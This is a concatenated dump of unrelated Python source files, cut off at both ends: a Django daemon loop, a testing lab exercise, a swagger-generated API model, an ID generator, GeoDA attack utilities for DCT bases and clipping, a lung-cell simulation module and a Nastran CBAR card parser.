                cron_spec = arg
            elif arg == '--delay':
                loop_delay = None
            elif arg == '--cron':
                cron_spec = ""
            elif arg == '--':
                our_arg = False
            else:
                command = arg
                our_arg = False
        elif not command:
            command = arg
            our_arg = False
        else:
            options.append(arg)

    if command is None:
        abort('missing command')
    if not loop_delay:
        abort('missing delay')

    # open metrics exporter endpoint
    start_http_server(9100)

    if cron_spec is not None:
        # BUG FIX: this must test `is not None`, not truthiness -- an empty
        # spec ("--cron" immediately followed by "--") is falsy, so the
        # abort below was previously unreachable and the daemon silently
        # fell back to fixed-delay mode.
        if len(cron_spec) == 0:
            abort('missing cron specification')

        # initial pause: wait for the first scheduled cron slot
        pause(time.time())

    release_id = os.getenv('RELEASE_ID', None)
    if not release_id:
        m = re.match(r'(.+?)-daemon-.+$', os.getenv('HOSTNAME', ''))
        release_id = m.group(1) if m else 'default'

    # initialize django
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'project.settings')
    django.setup()

    # run provided management command in a loop
    while True:
        if finish_signal:
            finish_on_signal()

        start = time.time()
        rv = -1
        try:
            rv = management.call_command(command, *options)
        except SystemExit as ex:
            # management commands may sys.exit(); capture the status instead
            rv = int(str(ex))
        except Exception as ex:
            rv = -1
            report("exception: {}".format(ex), error=True)

        finish = time.time()
        duration = finish - start

        management_daemon_command_exit.labels(
            command, release_id).set(rv if rv and isinstance(rv, int) else 0)
        management_daemon_command_start.labels(
            command, release_id).set(start)
        management_daemon_command_finish.labels(
            command, release_id).set(finish)
        management_daemon_command_duration.labels(
            command, release_id).set(duration)

        pause(start)
if __name__ == '__main__':
main()
| 2.125 | 2 |
c2_python-operating-system/5_testing-in-python/_scripts/validations.py | DrShams/google-it-automation | 0 | 12757438 | #!/usr/bin/python3
def validate_user(name, minlen):
    """Return True when *name* is an alphanumeric username of length >= *minlen*.

    Raises AssertionError for non-string names and ValueError for minlen < 1.
    """
    assert type(name) == str, "username must be a string"
    if minlen < 1:
        raise ValueError("minlen must be at least 1")
    return len(name) >= minlen and name.isalnum()
#LAB
#1
my_list = [27, 5, 9, 6, 8]


def RemoveValue(myVal):
    """Remove *myVal* from the shared my_list and return the list.

    Raises ValueError when the value is not present.
    """
    if myVal not in my_list:
        raise ValueError("Value must be in the given list")
    my_list.remove(myVal)
    return my_list
print("1",RemoveValue(27))
#print("2",RemoveValue(27))
#2
my_word_list = ['east', 'after', 'up', 'over', 'inside']
def OrganizeList(myList):
    """Validate that every entry is a string, then sort the list in place."""
    for entry in myList:
        assert type(entry) == str, "Word list must be a list of strings"
    myList.sort()
    return myList
my_new_list = [6, 3, 8, "12", 42]
#print(OrganizeList(my_new_list))
#without assert
#TypeError: '<' not supported between instances of 'str' and 'int'
#3
import random
participants = ['Jack','Jill','NotLarry','Tom']
# Revised Guess() function
def Guess(participants):
    """Draw a random number from 1-9 for each participant.

    Returns True/False depending on whether 'Larry' drew a 9, or None
    when there is no 'Larry' among the participants.
    """
    draws = {person: random.randint(1, 9) for person in participants}
    try:
        return draws['Larry'] == 9
    except KeyError:
        return None
print(Guess(participants))
| 3.828125 | 4 |
metal_python/models/v1_machine_register_request.py | metal-stack/metal-python | 7 | 12757439 | <reponame>metal-stack/metal-python
# coding: utf-8
"""
metal-api
API to manage and control plane resources like machines, switches, operating system images, machine sizes, networks, IP addresses and more # noqa: E501
OpenAPI spec version: v0.15.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class V1MachineRegisterRequest(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # maps python attribute name -> swagger-declared type (used by to_dict)
    swagger_types = {
        'bios': 'V1MachineBIOS',
        'hardware': 'V1MachineHardwareExtended',
        'ipmi': 'V1MachineIPMI',
        'partitionid': 'str',
        'rackid': 'str',
        'tags': 'list[str]',
        'uuid': 'str'
    }

    # maps python attribute name -> JSON key in the API payload
    attribute_map = {
        'bios': 'bios',
        'hardware': 'hardware',
        'ipmi': 'ipmi',
        'partitionid': 'partitionid',
        'rackid': 'rackid',
        'tags': 'tags',
        'uuid': 'uuid'
    }

    def __init__(self, bios=None, hardware=None, ipmi=None, partitionid=None, rackid=None, tags=None, uuid=None):  # noqa: E501
        """V1MachineRegisterRequest - a model defined in Swagger"""  # noqa: E501
        self._bios = None
        self._hardware = None
        self._ipmi = None
        self._partitionid = None
        self._rackid = None
        self._tags = None
        self._uuid = None
        self.discriminator = None
        # all fields are required: each property setter below raises
        # ValueError when assigned None
        self.bios = bios
        self.hardware = hardware
        self.ipmi = ipmi
        self.partitionid = partitionid
        self.rackid = rackid
        self.tags = tags
        self.uuid = uuid

    @property
    def bios(self):
        """Gets the bios of this V1MachineRegisterRequest.  # noqa: E501

        bios information of this machine  # noqa: E501

        :return: The bios of this V1MachineRegisterRequest.  # noqa: E501
        :rtype: V1MachineBIOS
        """
        return self._bios

    @bios.setter
    def bios(self, bios):
        """Sets the bios of this V1MachineRegisterRequest.

        bios information of this machine  # noqa: E501

        :param bios: The bios of this V1MachineRegisterRequest.  # noqa: E501
        :type: V1MachineBIOS
        """
        if bios is None:
            raise ValueError("Invalid value for `bios`, must not be `None`")  # noqa: E501

        self._bios = bios

    @property
    def hardware(self):
        """Gets the hardware of this V1MachineRegisterRequest.  # noqa: E501

        the hardware of this machine  # noqa: E501

        :return: The hardware of this V1MachineRegisterRequest.  # noqa: E501
        :rtype: V1MachineHardwareExtended
        """
        return self._hardware

    @hardware.setter
    def hardware(self, hardware):
        """Sets the hardware of this V1MachineRegisterRequest.

        the hardware of this machine  # noqa: E501

        :param hardware: The hardware of this V1MachineRegisterRequest.  # noqa: E501
        :type: V1MachineHardwareExtended
        """
        if hardware is None:
            raise ValueError("Invalid value for `hardware`, must not be `None`")  # noqa: E501

        self._hardware = hardware

    @property
    def ipmi(self):
        """Gets the ipmi of this V1MachineRegisterRequest.  # noqa: E501

        the ipmi access infos  # noqa: E501

        :return: The ipmi of this V1MachineRegisterRequest.  # noqa: E501
        :rtype: V1MachineIPMI
        """
        return self._ipmi

    @ipmi.setter
    def ipmi(self, ipmi):
        """Sets the ipmi of this V1MachineRegisterRequest.

        the ipmi access infos  # noqa: E501

        :param ipmi: The ipmi of this V1MachineRegisterRequest.  # noqa: E501
        :type: V1MachineIPMI
        """
        if ipmi is None:
            raise ValueError("Invalid value for `ipmi`, must not be `None`")  # noqa: E501

        self._ipmi = ipmi

    @property
    def partitionid(self):
        """Gets the partitionid of this V1MachineRegisterRequest.  # noqa: E501

        the partition id to register this machine with  # noqa: E501

        :return: The partitionid of this V1MachineRegisterRequest.  # noqa: E501
        :rtype: str
        """
        return self._partitionid

    @partitionid.setter
    def partitionid(self, partitionid):
        """Sets the partitionid of this V1MachineRegisterRequest.

        the partition id to register this machine with  # noqa: E501

        :param partitionid: The partitionid of this V1MachineRegisterRequest.  # noqa: E501
        :type: str
        """
        if partitionid is None:
            raise ValueError("Invalid value for `partitionid`, must not be `None`")  # noqa: E501

        self._partitionid = partitionid

    @property
    def rackid(self):
        """Gets the rackid of this V1MachineRegisterRequest.  # noqa: E501

        the rack id where this machine is connected to  # noqa: E501

        :return: The rackid of this V1MachineRegisterRequest.  # noqa: E501
        :rtype: str
        """
        return self._rackid

    @rackid.setter
    def rackid(self, rackid):
        """Sets the rackid of this V1MachineRegisterRequest.

        the rack id where this machine is connected to  # noqa: E501

        :param rackid: The rackid of this V1MachineRegisterRequest.  # noqa: E501
        :type: str
        """
        if rackid is None:
            raise ValueError("Invalid value for `rackid`, must not be `None`")  # noqa: E501

        self._rackid = rackid

    @property
    def tags(self):
        """Gets the tags of this V1MachineRegisterRequest.  # noqa: E501

        tags for this machine  # noqa: E501

        :return: The tags of this V1MachineRegisterRequest.  # noqa: E501
        :rtype: list[str]
        """
        return self._tags

    @tags.setter
    def tags(self, tags):
        """Sets the tags of this V1MachineRegisterRequest.

        tags for this machine  # noqa: E501

        :param tags: The tags of this V1MachineRegisterRequest.  # noqa: E501
        :type: list[str]
        """
        if tags is None:
            raise ValueError("Invalid value for `tags`, must not be `None`")  # noqa: E501

        self._tags = tags

    @property
    def uuid(self):
        """Gets the uuid of this V1MachineRegisterRequest.  # noqa: E501

        the product uuid of the machine to register  # noqa: E501

        :return: The uuid of this V1MachineRegisterRequest.  # noqa: E501
        :rtype: str
        """
        return self._uuid

    @uuid.setter
    def uuid(self, uuid):
        """Sets the uuid of this V1MachineRegisterRequest.

        the product uuid of the machine to register  # noqa: E501

        :param uuid: The uuid of this V1MachineRegisterRequest.  # noqa: E501
        :type: str
        """
        if uuid is None:
            raise ValueError("Invalid value for `uuid`, must not be `None`")  # noqa: E501

        self._uuid = uuid

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # recursively serialise nested models, lists and dicts of models
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(V1MachineRegisterRequest, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, V1MachineRegisterRequest):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| 1.898438 | 2 |
hrid/hrid.py | scrummyin/human-readable-id | 4 | 12757440 | import random
from .adjectives import ADJECTIVES
from .nouns import NOUNS, ANIMALS, FLOWERS
from .verbs import VERBS
from .adverbs import ADVERBS
# Maps a part-of-speech keyword to its candidate word list; 'number'
# yields the two-digit strings "10".."98".
DICTIONARY = {
    'adjective': ADJECTIVES,
    'noun': NOUNS,
    'verb': VERBS,
    'adverb': ADVERBS,
    'number': list(map(str, range(10,99)))
}
class HRID:
    """Generates human-readable identifiers (e.g. ``hungry-cat-runs-quickly``).

    Each entry of ``hridfmt`` that names a part of speech in DICTIONARY is
    replaced by a random word of that kind; any other entry is kept verbatim.
    """

    def __init__(self, delimeter='-', hridfmt=('adjective', 'noun', 'verb', 'adverb')):
        self.delimeter = delimeter
        # resolve each format element to its word list, keeping literals as-is
        self.phrasefmt = [DICTIONARY.get(element, element) for element in hridfmt]

    def generate(self):
        """Build one identifier by drawing a random word for each slot."""
        chosen = []
        for part in self.phrasefmt:
            if isinstance(part, str):
                chosen.append(part)
            if isinstance(part, list):
                chosen.append(random.choice(part))
        return self.delimeter.join(chosen)
| 3.25 | 3 |
GeoDA/utils.py | machanic/TangentAttack | 4 | 12757441 | import numpy as np
import os
import torch
import copy
from math import cos, sqrt, pi
def dct(x, y, v, u, n):
    """Return the (x, y) sample of the 2-D DCT-II basis function for
    frequency pair (u, v) on an n x n grid."""

    def alpha(a):
        # DCT-II orthonormalisation factor
        return sqrt(1.0 / n) if a == 0 else sqrt(2.0 / n)

    cos_x = cos(((2 * x + 1) * (u * pi)) / (2 * n))
    cos_y = cos(((2 * y + 1) * (v * pi)) / (2 * n))
    return alpha(u) * alpha(v) * cos_x * cos_y
def generate_2d_dct_basis(root_path, image_height, sub_dim=75):
    """Build (or load from a disk cache) a low-frequency 2-D DCT basis.

    Returns an (image_height**2, sub_dim**2) ndarray whose columns are the
    flattened DCT basis images for frequencies u, v < sub_dim.  The matrix is
    cached under ``root_path`` and reloaded on subsequent calls.
    """
    path = "{}/attacked_images/GeoDA/2d_dct_basis_height_{}_subdim_{}.npy".format(root_path, image_height, sub_dim)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    if os.path.exists(path):
        return np.load(path)
    n = image_height  # Assume square image, so we don't have different xres and yres

    # We can get different frequencies by setting u and v
    # Here, we have a max u and v to loop over and display
    maxU = sub_dim
    maxV = sub_dim

    dct_basis = []
    for u in range(0, maxU):
        for v in range(0, maxV):
            basisImg = np.zeros((n, n))
            for y in range(0, n):
                for x in range(0, n):
                    basisImg[y, x] = dct(x, y, v, u, max(n, maxV))
            dct_basis.append(basisImg)

    # BUG FIX: build a plain ndarray instead of the deprecated np.mat matrix,
    # so the fresh-computation path returns the same type as the np.load
    # cache path above (np.load always yields an ndarray).
    dct_basis = np.reshape(dct_basis, (maxV * maxU, n * n)).T
    np.save(path, dct_basis)
    return dct_basis
def clip_image_values(x, minv, maxv):
    """Clamp tensor *x* into [minv, maxv]; bounds may be scalars or tensors."""
    if isinstance(minv, torch.Tensor):
        # element-wise bounds
        return torch.min(torch.max(x, minv), maxv)
    return torch.clamp(x, min=minv, max=maxv)
def valid_bounds(img, delta=255):
    """Return per-pixel lower/upper uint8 bounds within +/-delta of *img*.

    Bounds are additionally clipped to the valid pixel range [0, 255] and
    returned as a (lb, ub) pair of uint8 arrays.
    """
    # BUG FIX: use the builtin int -- the np.int alias was removed in
    # NumPy 1.24.  astype already copies, so the former deepcopy is redundant.
    im = np.asarray(img).astype(int)

    # General valid bounds [0, 255]
    valid_lb = np.zeros_like(im)
    valid_ub = np.full_like(im, 255)

    # Compute the bounds
    lb = im - delta
    ub = im + delta

    # Validate that the bounds are in [0, 255]
    lb = np.maximum(valid_lb, np.minimum(lb, im))
    ub = np.minimum(valid_ub, np.maximum(ub, im))

    # Change types to uint8
    lb = lb.astype(np.uint8)
    ub = ub.astype(np.uint8)

    return lb, ub
def inv_tf(x, mean, std):
    """Undo per-channel normalisation in place and return the image in
    HWC layout (input is assumed channels-first -- TODO confirm)."""
    for channel in range(len(mean)):
        x[channel] = np.multiply(x[channel], std[channel], dtype=np.float32)
        x[channel] = np.add(x[channel], mean[channel], dtype=np.float32)

    # CHW -> HWC (equivalent to swapaxes(0, 2) followed by swapaxes(0, 1))
    return np.transpose(x, (1, 2, 0))
def inv_tf_pert(r):
    """Collapse a channels-first perturbation into a 0/1 per-pixel mask."""
    mask = np.sum(np.absolute(r), axis=0)
    # flag every pixel that was perturbed in at least one channel
    np.putmask(mask, mask != 0, 1)
    return mask
def get_label(x):
    """Return everything after the first space-separated token, with each
    remaining word followed by a single space (trailing space included)."""
    words = x.split(' ')
    return ''.join(word + ' ' for word in words[1:])
def nnz_pixels(arr):
    """Count pixels that are non-zero in at least one channel (axis 0)."""
    return np.count_nonzero(np.absolute(arr).sum(axis=0))
| 2.1875 | 2 |
nlisim/modules/pneumocyte.py | jbeezley/simulation-hello-world | 4 | 12757442 | import math
from typing import Any, Dict, Tuple
import attr
from attr import attrib, attrs
import numpy as np
from nlisim.cell import CellData, CellFields, CellList
from nlisim.coordinates import Point, Voxel
from nlisim.grid import RectangularGrid
from nlisim.modules.phagocyte import (
PhagocyteCellData,
PhagocyteModel,
PhagocyteModuleState,
PhagocyteStatus,
)
from nlisim.random import rg
from nlisim.state import State
from nlisim.util import TissueType, activation_function
class PneumocyteCellData(PhagocyteCellData):
    # Pneumocyte-specific fields stored on top of the generic phagocyte record.
    PNEUMOCYTE_FIELDS: CellFields = [
        ('status', np.uint8),
        ('status_iteration', np.uint),
        ('tnfa', bool),
    ]

    dtype = np.dtype(
        CellData.FIELDS + PhagocyteCellData.PHAGOCYTE_FIELDS + PNEUMOCYTE_FIELDS, align=True
    )  # type: ignore

    @classmethod
    def create_cell_tuple(
        cls,
        **kwargs,
    ) -> Tuple:
        """Build the structured-array record tuple for one pneumocyte.

        Unrecognized keyword arguments are forwarded to the parent classes;
        the pneumocyte fields default to RESTING / iteration 0 / no TNFa.
        """
        initializer = {
            'status': kwargs.get('status', PhagocyteStatus.RESTING),
            'status_iteration': kwargs.get('status_iteration', 0),
            'tnfa': kwargs.get('tnfa', False),
        }

        # ensure that these come in the correct order
        return PhagocyteCellData.create_cell_tuple(**kwargs) + tuple(
            [initializer[key] for key, *_ in PneumocyteCellData.PNEUMOCYTE_FIELDS]
        )
@attrs(kw_only=True, frozen=True, repr=False)
class PneumocyteCellList(CellList):
    # CellList specialised to hold PneumocyteCellData records.
    CellDataClass = PneumocyteCellData
def cell_list_factory(self: 'PneumocyteState') -> PneumocyteCellList:
    # attrs default factory: an empty cell list bound to the global grid.
    return PneumocyteCellList(grid=self.global_state.grid)
@attrs(kw_only=True)
class PneumocyteState(PhagocyteModuleState):
    """Module-level state for the pneumocyte model: cells plus config-derived constants."""
    cells: PneumocyteCellList = attrib(default=attr.Factory(cell_list_factory, takes_self=True))
    max_conidia: int  # units: conidia
    time_to_rest: float  # units: hours
    iter_to_rest: int  # units: steps
    time_to_change_state: float  # units: hours
    iter_to_change_state: int  # units: steps
    # p_il6_qtty: float  # units: mol * cell^-1 * h^-1
    # p_il8_qtty: float  # units: mol * cell^-1 * h^-1
    p_tnf_qtty: float  # units: atto-mol * cell^-1 * h^-1
    pr_p_int: float  # units: probability
    pr_p_int_param: float
class Pneumocyte(PhagocyteModel):
    """Pneumocyte module: seeds epithelial cells, runs their activation
    state machine, and secretes TNFa when active."""
    name = 'pneumocyte'
    StateClass = PneumocyteState

    def initialize(self, state: State):
        """Read config values, derive per-step constants, and place one
        pneumocyte (at a uniformly jittered position) per sampled
        epithelial voxel."""
        pneumocyte: PneumocyteState = state.pneumocyte
        voxel_volume: float = state.voxel_volume
        time_step_size: float = self.time_step
        lung_tissue: np.ndarray = state.lung_tissue

        pneumocyte.max_conidia = self.config.getint('max_conidia')  # units: conidia
        pneumocyte.time_to_rest = self.config.getint('time_to_rest')  # units: hours
        pneumocyte.time_to_change_state = self.config.getint('time_to_change_state')  # units: hours
        pneumocyte.p_tnf_qtty = self.config.getfloat(
            'p_tnf_qtty'
        )  # units: atto-mol * cell^-1 * h^-1
        pneumocyte.pr_p_int_param = self.config.getfloat('pr_p_int_param')

        # computed values
        pneumocyte.iter_to_rest = int(
            pneumocyte.time_to_rest * (60 / self.time_step)
        )  # units: hours * (min/hour) / (min/step) = step
        pneumocyte.iter_to_change_state = int(
            pneumocyte.time_to_change_state * (60 / self.time_step)
        )  # units: hours * (min/hour) / (min/step) = step

        # per-step interaction probability derived from the rate parameter
        pneumocyte.pr_p_int = -math.expm1(
            -time_step_size / 60 / (voxel_volume * pneumocyte.pr_p_int_param)
        )  # units: probability

        # initialize cells, placing one per epithelial voxel
        dz_field: np.ndarray = state.grid.delta(axis=0)
        dy_field: np.ndarray = state.grid.delta(axis=1)
        dx_field: np.ndarray = state.grid.delta(axis=2)
        epithelial_voxels = list(zip(*np.where(lung_tissue == TissueType.EPITHELIUM)))
        rg.shuffle(epithelial_voxels)
        for vox_z, vox_y, vox_x in epithelial_voxels[: self.config.getint('count')]:
            # the x,y,z coordinates are in the centers of the grids
            z = state.grid.z[vox_z]
            y = state.grid.y[vox_y]
            x = state.grid.x[vox_x]
            dz = dz_field[vox_z, vox_y, vox_x]
            dy = dy_field[vox_z, vox_y, vox_x]
            dx = dx_field[vox_z, vox_y, vox_x]
            pneumocyte.cells.append(
                PneumocyteCellData.create_cell(
                    point=Point(
                        x=x + rg.uniform(-dx / 2, dx / 2),
                        y=y + rg.uniform(-dy / 2, dy / 2),
                        z=z + rg.uniform(-dz / 2, dz / 2),
                    )
                )
            )

        return state

    def single_step_probabilistic_drift(
        self, state: State, cell: PhagocyteCellData, voxel: Voxel
    ) -> Point:
        # pneumocytes do not move
        pass

    def advance(self, state: State, previous_time: float):
        """Advance the state by a single time step."""
        from nlisim.modules.afumigatus import (
            AfumigatusCellData,
            AfumigatusCellStatus,
            AfumigatusState,
        )

        # from nlisim.modules.il6 import IL6State
        # from nlisim.modules.il8 import IL8State
        from nlisim.modules.tnfa import TNFaState

        pneumocyte: PneumocyteState = state.pneumocyte
        afumigatus: AfumigatusState = state.afumigatus
        # il6: IL6State = getattr(state, 'il6', None)
        # il8: IL8State = getattr(state, 'il8', None)
        tnfa: TNFaState = state.tnfa
        grid: RectangularGrid = state.grid
        voxel_volume: float = state.voxel_volume

        for pneumocyte_cell_index in pneumocyte.cells.alive():
            pneumocyte_cell = pneumocyte.cells[pneumocyte_cell_index]
            pneumocyte_cell_voxel: Voxel = grid.get_voxel(pneumocyte_cell['point'])

            # self update: ACTIVE cells relax back to RESTING after
            # iter_to_rest steps; ACTIVATING cells become ACTIVE after
            # iter_to_change_state steps
            if pneumocyte_cell['status'] == PhagocyteStatus.ACTIVE:
                if pneumocyte_cell['status_iteration'] >= pneumocyte.iter_to_rest:
                    pneumocyte_cell['status_iteration'] = 0
                    pneumocyte_cell['status'] = PhagocyteStatus.RESTING
                    pneumocyte_cell['tnfa'] = False
                else:
                    pneumocyte_cell['status_iteration'] += 1

            elif pneumocyte_cell['status'] == PhagocyteStatus.ACTIVATING:
                if pneumocyte_cell['status_iteration'] >= pneumocyte.iter_to_change_state:
                    pneumocyte_cell['status_iteration'] = 0
                    pneumocyte_cell['status'] = PhagocyteStatus.ACTIVE
                else:
                    pneumocyte_cell['status_iteration'] += 1

            # ----------- interactions

            # interact with fungus
            if pneumocyte_cell['status'] not in {
                PhagocyteStatus.APOPTOTIC,
                PhagocyteStatus.NECROTIC,
                PhagocyteStatus.DEAD,
            }:
                local_aspergillus = afumigatus.cells.get_cells_in_voxel(pneumocyte_cell_voxel)
                for aspergillus_index in local_aspergillus:
                    aspergillus_cell: AfumigatusCellData = afumigatus.cells[aspergillus_index]

                    # skip resting conidia
                    if aspergillus_cell['status'] == AfumigatusCellStatus.RESTING_CONIDIA:
                        continue

                    if pneumocyte_cell['status'] != PhagocyteStatus.ACTIVE:
                        if rg.uniform() < pneumocyte.pr_p_int:
                            pneumocyte_cell['status'] = PhagocyteStatus.ACTIVATING
                    else:
                        # TODO: I don't get this, looks like it zeros out the iteration
                        #  when activating
                        pneumocyte_cell['status_iteration'] = 0

            # # secrete IL6
            # if il6 is not None and pneumocyte_cell['status'] == PhagocyteStatus.ACTIVE:
            #     il6.grid[tuple(pneumocyte_cell_voxel)] += pneumocyte.p_il6_qtty
            #
            # # secrete IL8
            # if il8 is not None and pneumocyte_cell['tnfa']:
            #     il8.grid[tuple(pneumocyte_cell_voxel)] += pneumocyte.p_il8_qtty

            # interact with TNFa
            if pneumocyte_cell['status'] == PhagocyteStatus.ACTIVE:
                if (
                    activation_function(
                        x=tnfa.grid[tuple(pneumocyte_cell_voxel)],
                        k_d=tnfa.k_d,
                        h=self.time_step / 60,  # units: (min/step) / (min/hour)
                        volume=voxel_volume,
                        b=1,
                    )
                    < rg.uniform()
                ):
                    pneumocyte_cell['status_iteration'] = 0
                    pneumocyte_cell['tnfa'] = True

                # secrete TNFa
                tnfa.grid[tuple(pneumocyte_cell_voxel)] += pneumocyte.p_tnf_qtty

        return state

    def summary_stats(self, state: State) -> Dict[str, Any]:
        """Return counts of live pneumocytes per status plus the number of
        TNFa-active cells."""
        pneumocyte: PneumocyteState = state.pneumocyte
        live_pneumocytes = pneumocyte.cells.alive()

        max_index = max(map(int, PhagocyteStatus))
        status_counts = np.bincount(
            np.fromiter(
                (
                    pneumocyte.cells[pneumocyte_cell_index]['status']
                    for pneumocyte_cell_index in live_pneumocytes
                ),
                dtype=np.uint8,
            ),
            minlength=max_index + 1,
        )

        tnfa_active = int(
            np.sum(
                np.fromiter(
                    (
                        pneumocyte.cells[pneumocyte_cell_index]['tnfa']
                        for pneumocyte_cell_index in live_pneumocytes
                    ),
                    dtype=bool,
                )
            )
        )

        return {
            'count': len(pneumocyte.cells.alive()),
            'inactive': int(status_counts[PhagocyteStatus.INACTIVE]),
            'inactivating': int(status_counts[PhagocyteStatus.INACTIVATING]),
            'resting': int(status_counts[PhagocyteStatus.RESTING]),
            'activating': int(status_counts[PhagocyteStatus.ACTIVATING]),
            'active': int(status_counts[PhagocyteStatus.ACTIVE]),
            'apoptotic': int(status_counts[PhagocyteStatus.APOPTOTIC]),
            'necrotic': int(status_counts[PhagocyteStatus.NECROTIC]),
            'interacting': int(status_counts[PhagocyteStatus.INTERACTING]),
            'TNFa active': tnfa_active,
        }

    def visualization_data(self, state: State):
        # expose the cell list for visualization
        return 'cells', state.pneumocyte.cells
| 2.1875 | 2 |
pyNastran/dev/bdf_vectorized/cards/elements/bar/cbar.py | ACea15/pyNastran | 293 | 12757443 | from numpy import array, arange, zeros, unique, searchsorted, full, nan
from numpy.linalg import norm # type: ignore
from pyNastran.utils.numpy_utils import integer_types
from pyNastran.bdf.field_writer_8 import print_card_8, set_blank_if_default
from pyNastran.bdf.field_writer_16 import print_card_16
from pyNastran.bdf.bdf_interface.assign_type import (
integer, integer_or_blank,
double_or_blank, integer_double_or_blank, string_or_blank)
from pyNastran.bdf.cards.elements.bars import BAROR
from pyNastran.bdf.field_writer_8 import set_string8_blank_if_default
from pyNastran.dev.bdf_vectorized.cards.elements.element import Element
class CBAR(Element):
    """
    Vectorized storage for CBAR bar-element cards.

    +-------+-----+-----+-----+-----+-----+-----+-----+------+
    | CBAR  | EID | PID | GA  | GB  | X1  | X2  | X3  | OFFT |
    +-------+-----+-----+-----+-----+-----+-----+-----+------+
    |       | PA  | PB  | W1A | W2A | W3A | W1B | W2B | W3B  |
    +-------+-----+-----+-----+-----+-----+-----+-----+------+

    or

    +-------+-----+-----+-----+-----+-----+-----+-----+------+
    | CBAR  | EID | PID | GA  | GB  | G0  |     |     | OFFT |
    +-------+-----+-----+-----+-----+-----+-----+-----+------+
    |       | PA  | PB  | W1A | W2A | W3A | W1B | W2B | W3B  |
    +-------+-----+-----+-----+-----+-----+-----+-----+------+

    +-------+-------+-----+-------+-------+--------+-------+-------+-------+
    |  CBAR |   2   |  39 |   7   |   6   |  105   |       |       |  GGG  |
    +-------+-------+-----+-------+-------+--------+-------+-------+-------+
    |       |       | 513 | 0.0+0 | 0.0+0 |   -9.  | 0.0+0 | 0.0+0 |  -9.  |
    +-------+-------+-----+-------+-------+--------+-------+-------+-------+
    """
    type = 'CBAR'
    def __init__(self, model):
        """
        Defines the CBAR object.

        Parameters
        ----------
        model : BDF
           the BDF object
        """
        Element.__init__(self, model)

    def allocate(self, card_count):
        """Pre-allocate the per-element arrays for the number of CBAR cards."""
        ncards = card_count[self.type]
        self.n = ncards
        if self.n:
            assert isinstance(ncards, int), ncards
            float_fmt = self.model.float_fmt
            #: Element ID
            self.element_id = zeros(ncards, 'int32')
            #: Property ID
            self.property_id = zeros(ncards, 'int32')
            self.node_ids = zeros((ncards, 2), 'int32')
            # orientation given either by a node (g0) or by a vector (x)
            self.is_g0 = zeros(ncards, 'bool')
            self.g0 = full(ncards, nan, 'int32')
            self.x = full((ncards, 3), nan, float_fmt)
            self.offt = full(ncards, nan, '|U3')
            self.pin_flags = zeros((ncards, 2), 'int32')
            self.wa = zeros((ncards, 3), float_fmt)
            self.wb = zeros((ncards, 3), float_fmt)

    def add_card(self, card, comment=''):
        """Parse one CBAR card into slot ``self.i`` of the arrays."""
        i = self.i
        # NOTE(review): CBAROR-based defaults are deliberately disabled
        # via the `0 and` guard; the else branch always runs.
        if 0 and self.model.cbaror.n > 0:
            cbaror = self.model.cbaror
            pid_default = cbaror.property_id
            is_g0_default = cbaror.is_g0
            x1_default = cbaror.x[0]
            x2_default = cbaror.x[1]
            x3_default = cbaror.x[2]
            g0_default = cbaror.g0
            offt_default = cbaror.offt
        else:
            pid_default = None
            is_g0_default = None
            x1_default = 0.0
            x2_default = 0.0
            x3_default = 0.0
            g0_default = None
            offt_default = 'GGG'

        eid = integer(card, 1, 'element_id')
        self.element_id[i] = eid
        if pid_default is not None:
            self.property_id[i] = integer_or_blank(card, 2, 'property_id', pid_default)
        else:
            # the property id defaults to the element id
            self.property_id[i] = integer_or_blank(card, 2, 'property_id', eid)
        self.node_ids[i] = [integer(card, 3, 'GA'),
                            integer(card, 4, 'GB')]

        #---------------------------------------------------------
        # x / g0: field 5 is either an orientation node (int) or the
        # first component of an orientation vector (float)
        if g0_default is not None:
            field5 = integer_double_or_blank(card, 5, 'g0_x1', g0_default)
        else:
            field5 = integer_double_or_blank(card, 5, 'g0_x1', x1_default)

        if isinstance(field5, integer_types):
            self.is_g0[i] = True
            self.g0[i] = field5
        elif isinstance(field5, float):
            self.is_g0[i] = False
            x = array([field5,
                       double_or_blank(card, 6, 'x2', x2_default),
                       double_or_blank(card, 7, 'x3', x3_default)], dtype='float64')
            self.x[i, :] = x
            if norm(x) == 0.0:
                msg = 'G0 vector defining plane 1 is not defined on CBAR %s.\n' % eid
                msg += 'G0 = %s\n' % field5
                msg += 'X  = %s\n' % x
                msg += '%s' % card
                raise RuntimeError(msg)
        else:
            msg = ('field5 on CBAR (G0/X1) is the wrong type...id=%s field5=%s '
                   'type=%s' % (self.eid, field5, type(field5)))
            raise RuntimeError(msg)

        #---------------------------------------------------------
        # offt
        # bit doesn't exist on the CBAR
        offt = string_or_blank(card, 8, 'offt', offt_default)
        msg = 'invalid offt parameter of CBEAM...offt=%s' % offt
        assert offt[0] in ['G', 'B', 'O', 'E'], msg
        assert offt[1] in ['G', 'B', 'O', 'E'], msg
        assert offt[2] in ['G', 'B', 'O', 'E'], msg
        self.offt[i] = offt

        self.pin_flags[i, :] = [integer_or_blank(card, 9, 'pa', 0),
                                integer_or_blank(card, 10, 'pb', 0)]

        self.wa[i, :] = [double_or_blank(card, 11, 'w1a', 0.0),
                         double_or_blank(card, 12, 'w2a', 0.0),
                         double_or_blank(card, 13, 'w3a', 0.0),]

        self.wb[i, :] = [double_or_blank(card, 14, 'w1b', 0.0),
                         double_or_blank(card, 15, 'w2b', 0.0),
